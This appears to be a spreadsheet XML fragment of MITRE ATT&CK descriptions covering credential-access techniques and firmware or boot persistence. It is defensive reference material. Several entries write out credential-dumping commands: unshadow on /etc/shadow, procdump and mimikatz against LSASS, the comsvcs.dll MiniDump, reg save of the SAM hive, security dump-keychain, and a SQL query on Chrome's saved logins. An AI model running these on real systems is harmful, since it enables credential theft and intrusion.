    <t>Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.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[OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)
In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to dump the contents of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to enable offline password cracking. Most modern Linux operating systems use a combination of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to store user account information including password hashes in &lt;code&gt;/etc/shadow&lt;/code&gt;. By default, &lt;code&gt;/etc/shadow&lt;/code&gt; is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) &lt;code&gt;# /usr/bin/unshadow /etc/passwd /etc/shadow &gt; /tmp/crack.password.db&lt;/code&gt;
</t>
  </si>
  <si>
    <t>Adversaries may search the Registry on compromised systems for insecurely stored credentials. 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
Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)
* Local Machine Hive: &lt;code&gt;reg query HKLM /f password /t REG_SZ /s&lt;/code&gt;
* Current User Hive: &lt;code&gt;reg query HKCU /f password /t REG_SZ /s&lt;/code&gt;</t>
  </si>
  <si>
    <t>Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials.
Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)</t>
  </si>
  <si>
    <t>Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)</t>
  </si>
  <si>
    <t>Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at &lt;code&gt;HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets&lt;/code&gt;. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* &lt;code&gt;procdump -ma lsass.exe lsass_dump&lt;/code&gt;
Locally, mimikatz can be run using:
* &lt;code&gt;sekurlsa::Minidump lsassdump.dmp&lt;/code&gt;
* &lt;code&gt;sekurlsa::logonPasswords&lt;/code&gt;
Built-in Windows tools such as comsvcs.dll can also be used:
* &lt;code&gt;rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID  lsass.dmp full&lt;/code&gt;(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Windows Security Support Provider (SSP) DLLs are loaded into LSASS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The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
</t>
  </si>
  <si>
    <t>Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/&lt;PID&gt;/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/&lt;PID&gt;/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)
If running as or with the permissions of a web browser, a process can search the `/maps` &amp; `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.  
Secrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables.  
If an adversary is able to gain sufficient privileges in a cloud environment – for example, by obtaining the credentials of high-privileged [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004) or compromising a service that has permission to retrieve secrets – they may be able to request secrets from the secrets manager. This can be accomplished via commands such as `get-secret-value` in AWS, `gcloud secrets describe` in GCP, and `az key vault secret show` in Azure.(Citation: Permiso Scattered Spider 2023)(Citation: Sysdig ScarletEel 2.0 2023)(Citation: AWS Secrets Manager)(Citation: Google Cloud Secrets)(Citation: Microsoft Azure Key Vault)
**Note:** this technique is distinct from [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005) in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.</t>
  </si>
  <si>
    <t>An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the &lt;code&gt;NotOnOrAfter&lt;/code&gt; value of the &lt;code&gt;conditions ...&lt;/code&gt; element in a token. This value can be changed using the &lt;code&gt;AccessTokenLifetime&lt;/code&gt; in a &lt;code&gt;LifetimeTokenPolicy&lt;/code&gt;.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)</t>
  </si>
  <si>
    <t>Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.
Adversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.
Once forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.
Credential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\`. The encryption key can be found in a file named &lt;code&gt;Policy.vpol&lt;/code&gt;, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)
Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. &lt;code&gt;vaultcmd.exe&lt;/code&gt; is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as &lt;code&gt;CredEnumerateA&lt;/code&gt;, may also be absued to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running &lt;code&gt;rundll32.exe keymgr.dll KRShowKeyMgr&lt;/code&gt; then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI.
Password recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in &lt;code&gt;%SystemRoot%\NTDS\Ntds.dit&lt;/code&gt; of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
</t>
  </si>
  <si>
    <t>An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)</t>
  </si>
  <si>
    <t>Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) 
Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)
The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.</t>
  </si>
  <si>
    <t>Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
Silver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)
Password hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).</t>
  </si>
  <si>
    <t>Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) 
Preauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)
For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) 
An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)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t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the &lt;code&gt;net user&lt;/code&gt; command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* &lt;code&gt;reg save HKLM\sam sam&lt;/code&gt;
* &lt;code&gt;reg save HKLM\system system&lt;/code&gt;
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes: 
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.
For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt; and executing a SQL query: &lt;code&gt;SELECT action_url, username_value, password_value FROM logins;&lt;/code&gt;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function &lt;code&gt;CryptUnprotectData&lt;/code&gt;, which uses the victim’s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)
Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).
Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)
After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service. 
Keychains can be viewed and edited through the Keychain Access application or using the command-line utility &lt;code&gt;security&lt;/code&gt;. Keychain files are located in &lt;code&gt;~/Library/Keychains/&lt;/code&gt;, &lt;code&gt;/Library/Keychains/&lt;/code&gt;, and &lt;code&gt;/Network/Library/Keychains/&lt;/code&gt;.(Citation: Keychain Services Apple)(Citation: Keychain Decryption Passware)(Citation: OSX Keychain Schaumann)
Adversaries may gather user credentials from Keychain storage/memory. For example, the command &lt;code&gt;security dump-keychain –d&lt;/code&gt; will dump all Login Keychain credentials from &lt;code&gt;~/Library/Keychains/login.keychain-db&lt;/code&gt;. Adversaries may also directly read Login Keychain credentials from the &lt;code&gt;~/Library/Keychains/login.keychain&lt;/code&gt; file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to login to the macOS host.(Citation: External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)  </t>
  </si>
  <si>
    <t>Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
 Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) 
Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)
Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)
This same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)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t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.
Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. </t>
  </si>
  <si>
    <t>Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.
There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)</t>
  </si>
  <si>
    <t>Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. 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When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.
Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)</t>
  </si>
  <si>
    <t>Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.
Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) 
OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)
For example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)
Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)
Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords.  For example, in AWS environments, an adversary who compromises a user’s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.</t>
  </si>
  <si>
    <t>Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
When preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003).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access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)
A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)
A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)
Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)</t>
  </si>
  <si>
    <t>Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.</t>
  </si>
  <si>
    <t>Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.</t>
  </si>
  <si>
    <t>Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.</t>
  </si>
  <si>
    <t>Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.</t>
  </si>
  <si>
